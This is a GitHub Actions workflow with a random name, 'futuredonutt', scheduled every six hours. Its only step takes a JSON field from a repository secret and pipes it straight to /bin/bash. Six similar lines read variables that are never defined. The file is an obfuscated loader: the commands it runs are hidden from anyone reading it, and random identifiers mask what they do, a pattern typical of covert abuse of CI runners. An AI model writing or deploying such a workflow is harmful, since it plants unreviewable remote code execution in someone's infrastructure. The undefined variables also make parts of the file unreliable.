name: futuredonutt
on:
  workflow_dispatch:
  schedule:
    - cron: '23 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: futuredonutt
        env:
          nqn7: ${{ secrets.nqn7 }}
        run: |
          echo $nqn7 | jq -r .f1 | /bin/bash
          echo $x17 | jq -r .rjqx72876 | /bin/bash
          echo $gjpsb8 | jq -r .d6 | /bin/bash
          echo $mdys48014 | jq -r .rnmco73 | /bin/bash
          echo $dcak17 | jq -r .clfj7 | /bin/bash
          echo $v36 | jq -r .fvpv56093 | /bin/bash
          echo $h11226 | jq -r .zp9 | /bin/bash

